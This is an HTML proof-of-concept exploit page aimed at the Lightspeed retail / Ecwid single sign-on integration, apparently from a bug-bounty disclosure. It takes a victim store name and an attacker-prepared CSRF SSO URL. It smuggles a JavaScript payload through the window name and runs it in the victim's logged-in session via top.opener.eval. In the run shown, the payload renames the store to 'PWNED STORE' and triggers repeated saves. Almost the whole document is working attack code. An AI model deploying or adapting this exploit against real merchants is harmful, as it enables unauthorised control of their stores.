<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<style>
    body { margin: 0; font-family: Arial, sans-serif; display: flex; justify-content: center; align-items: center; height: 100vh; background-color: #f0f0f0; }
    .container { text-align: center; }
    .input-field, .btn { padding: 10px; font-size: 18px; border-radius: 5px; border: 2px solid #ccc; width: 80%; max-width: 400px; box-sizing: border-box; }
    .btn { margin-top: 20px; background-color: #007bff; color: #fff; border: none; cursor: pointer; transition: background-color 0.3s ease; }
    .btn:hover { background-color: #0056b3; }
</style>
</head>
<body>

<div class="container">
    <div class="input-group">
        <label for="storenameText">Enter the victim's store name:<br><br></label>
        <input type="text" id="storenameText" class="input-field" value="demovictim">
    </div>
    <div class="input-group">
        <label for="csrfText">Enter the attackers CSRF url:<br><br></label>
        <input type="text" id="csrfText" class="input-field" placeholder="e.g. https://my.ecwid.com/api/v3/79140284/sso?signature=2b8d5449f701...">
    </div>
    <button onclick="start()" class="btn">Submit</button>
</div>

<script>

  // This payload string is passed as the name parameter to window.open
  payload =`
          pwn=\`
        
          // Update the store name
          textarea = document.getElementById('SPE.StNTxt');
          textarea.value='PWNED STORE'
          event = new Event('input', { bubbles: true});
          textarea.dispatchEvent(event);
          document.querySelector('.btn.save-panel__btn-save.btn-primary.btn-medium').dispatchEvent(new MouseEvent("click",{bubbles: true, cancellable: true}));
  
        setTimeout(()=>{
            document.querySelector('.btn.save-panel__btn-save.btn-primary.btn-medium').dispatchEvent(new MouseEvent("click",{bubbles: true, cancellable: true}));
        },1000);

        setTimeout(()=>{
            document.querySelector('.btn.save-panel__btn-save.btn-primary.btn-medium').dispatchEvent(new MouseEvent("click",{bubbles: true, cancellable: true}));
        },2000);

        setTimeout(()=>{
            document.querySelector('.btn.save-panel__btn-save.btn-primary.btn-medium').dispatchEvent(new MouseEvent("click",{bubbles: true, cancellable: true}));
        },3000);
  
        setTimeout(()=>{
            document.querySelector('.btn.save-panel__btn-save.btn-primary.btn-medium').dispatchEvent(new MouseEvent("click",{bubbles: true, cancellable: true}));
            //document.body.innerHTML='<br><br><br><br><br>&nbsp;&nbsp;&nbsp;<h1 style=color:red>pwned your shop name changed to PWNED STORE</h1>'
        },4000);
          \`
  
  setTimeout(()=>{top.opener.eval(pwn);},6000);
  //setTimeout(()=>{top.window.close()},5000);
  
  
  `

  // When the Submit button is clicked: 
  start =()=>{
    // Open the CSRF url with the payload as the name of the window
    window.open(`${csrfText.value}#category:id=0&mode=edit`,payload);

    // Change the location of this window to the victim's X-Series SSO login to E-Series
    location=`https://${storenameText.value}.retail.lightspeed.app/setup/ecwid/sso_redirect?hide_visit_storefront_menu=true&hide_help_menu=true&hide_profile_menu=true&hide_page_header=true&hide_footer=true&hide_back_button=false&hide_vertical_navigation_menu=true&disable_scroll_on_page_switch=true#store-profile`;
  };

</script>

</body>
</html>
